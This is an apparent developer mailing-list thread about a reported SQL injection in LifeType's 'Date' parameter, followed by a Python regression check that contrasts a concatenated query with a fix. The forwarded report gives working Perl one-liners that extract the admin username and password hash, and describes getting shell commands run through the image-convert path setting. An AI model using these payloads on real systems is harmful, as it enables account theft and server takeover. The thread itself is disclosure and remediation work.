[pLog-svn] Fwd: Security problem

Jon Daley plogworld at jon.limedaley.com
Mon Jul 3 17:14:22 GMT 2006


I can't duplicate it on 1.0.5 or 1.0.6.

Does someone have time to go through all of the input variables to check 
for similar things?  I imagine more people are going to be interested in 
finding more hacks if we don't.

On Tue, 4 Jul 2006, Mark Wu wrote:
> I just created a 1.0.6 branch and also fixed this SQL injection in SVN rev
> 3681.
>
> Can anyone do a quick test to see if it's fixed or not?
>
> I tested it under my Windows environment, it seems fixed.
>
> Mark
>
>> -----Original Message-----
>> From: plog-svn-bounces at devel.lifetype.net
>> [mailto:plog-svn-bounces at devel.lifetype.net] On Behalf Of
>> Oscar Renalias
>> Sent: Monday, July 03, 2006 11:58 PM
>> To: plog-svn at devel.lifetype.net
>> Subject: [pLog-svn] Fwd: Security problem
>>
>> Can somebody quickly investigate this?
>>
>> ---------- Forwarded message ----------
>> From: A. Ramos <aramosf at unsec.net>
>> Date: Jul 3, 2006 5:45 PM
>> Subject: Security problem
>> To: contact at lifetype.net
>>
>>
>> Hello :-)
>>
>> There is one SQL injection in the latest version of LifeType:
>>
>>
>> To get md5 passwd:
>> perl -MLWP::Simple -e "getprint
>> 'http://localhost/index.php?op=Default&Date=200607\'%20UNION%2
>> 0SELECT%201,password,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE
>> %20id=\'1\'/*&blogId=1'"
>> | perl -ne 'print "password: ".$1."\n" if /articleId=(\w*).*h3/'
>>
>> To get admin username:
>> perl -MLWP::Simple -e "getprint
>> 'http://localhost/index.php?op=Default&Date=200607\'%20UNION%2
>> 0SELECT%201,user,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20i
>> d=\'1\'/*&blogId=1'"
>> | perl -ne 'print "admin: ".$1."\n" if /articleId=(\w*).*h3/'
>>
>> And if you can access the admin control panel, you can run
>> commands on the system by changing the value of /usr/bin/convert
>> and putting in your own command. Upload some picture and wait for
>> it to be resized with the evil command.
>>
>> I think there are more bugs but I haven't time to check for more.
>>
>> Thank you.
>>
>> --
>>
>> A. Ramos  <aka dab>
>> mailto: <aramosf at unsec.net>
>> http://www.unsec.net
>> _______________________________________________
>> pLog-svn mailing list
>> pLog-svn at devel.lifetype.net
>> http://devel.lifetype.net/mailman/listinfo/plog-svn
>

-- 
Jon Daley
http://jon.limedaley.com/

Better a meal of vegetables where there is love
   than a fattened calf with hatred.
-- Proverbs 15:17
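
A regression check for the reported `Date` injection, as an added example that is not part of this thread or of LifeType's code. It uses Python with an in-memory SQLite database rather than LifeType's PHP, and the table layout, the `LIKE` query and the function names are assumptions. It puts a concatenated query beside one that allowlists the date format and binds the value.

```python
import re
import sqlite3

def make_db():
    # Constructed schema and rows; the real LifeType tables differ.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE lt_articles (id INTEGER, topic TEXT, date TEXT);
        CREATE TABLE lt_users (id INTEGER, user TEXT, password TEXT);
        INSERT INTO lt_articles VALUES (7, 'July post', '20060702');
        INSERT INTO lt_articles VALUES (8, 'June post', '20060615');
        INSERT INTO lt_users VALUES (1, 'admin', 'constructed-md5-placeholder');
    """)
    return db

# Constructed test input shaped like the value in the report, cut down to
# the two columns of this sample query.
REPORTED = "200607' UNION SELECT id, password FROM lt_users WHERE id='1'/*"

def archive_unsafe(db, date):
    # 'Before' pattern: the request value is pasted into the SQL text,
    # so a quote in it ends the string literal and the rest runs as SQL.
    sql = "SELECT id, topic FROM lt_articles WHERE date LIKE '" + date + "%'"
    return db.execute(sql).fetchall()

# Only YYYYMM or YYYYMMDD, ASCII digits, anchored at both ends.
DATE_RE = re.compile(r"\A[0-9]{6}(?:[0-9]{2})?\Z")

def archive_safe(db, date):
    # 1) reject anything that is not a date, 2) bind instead of concatenating.
    if not isinstance(date, str) or not DATE_RE.match(date):
        raise ValueError("Date must be YYYYMM or YYYYMMDD")
    sql = "SELECT id, topic FROM lt_articles WHERE date LIKE ? || '%'"
    return db.execute(sql, (date,)).fetchall()

def regression_check(db):
    # Returns (rows leaked by the unsafe query, whether the safe one rejected).
    leaked = archive_unsafe(db, REPORTED)
    try:
        archive_safe(db, REPORTED)
        rejected = False
    except ValueError:
        rejected = True
    return leaked, rejected

if __name__ == "__main__":
    print(regression_check(make_db()))
```

The same two steps, a format allowlist plus a bound parameter, are what an audit of the other request variables would look for at each query site.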

